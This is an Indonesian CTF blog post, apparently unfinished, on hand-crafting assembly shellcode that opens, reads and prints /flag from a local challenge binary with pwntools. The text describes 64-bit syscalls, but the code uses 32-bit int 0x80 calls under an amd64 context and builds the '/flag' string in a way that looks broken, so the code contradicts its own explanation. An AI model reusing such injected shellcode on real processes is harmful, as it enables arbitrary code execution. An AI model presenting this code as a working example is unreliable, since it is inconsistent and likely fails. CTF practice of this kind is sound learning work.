Manual Crafting Shellcode
Contents
Deskripsi
Shellcraft bagus dan powerfull, tapi kurang nendang, sebagai orang yang menikmati suffering, selalu mencari jalan yang lebih susah dan rumit, gw akan mencoba untuk crafting sendiri pake assembly, dan gw usahakan bener bener crafting sendiri tanpa bantuan AI.
Craft Shellcode Cat /flag
Jadi secara garis besar, shellcode cat /flag ini nantinya akan memiliki pattern yang sama, yatu terbagi 4 bagian. Bagian pertama open, atau membuka file /flagnya dengan code sys_open rax 2, bagian kedua yaitu read atau sys_read rax 0, yang ketiga write atau sys_write rax 1, dan yang terakhir exit atau sys_exit rax 60. Alurnya gini, awalnya file di-open -> read -> write -> exit. Langsung aja
from pwn import *
context.binary = ELF('/chall')
context.update(arch='amd64', os='linux')
sc = asm("""
_start:
xor eax, eax
push 0x67
push 0x616c662f
mov eax, 5
mov ebx, esp
xor edx, edx
int 0x80
mov ebx, eax
sub esp, 0x100
mov ecx, esp
mov edx, 0x100
mov eax, 3
int 0x80
mov edx, eax
mov ebx, 1
mov eax, 4
int 0x80
mov eax, 1
xor ebx, ebx
int 0x80
""")
p = process()
p.send(sc)
p.interactive()To BeContinued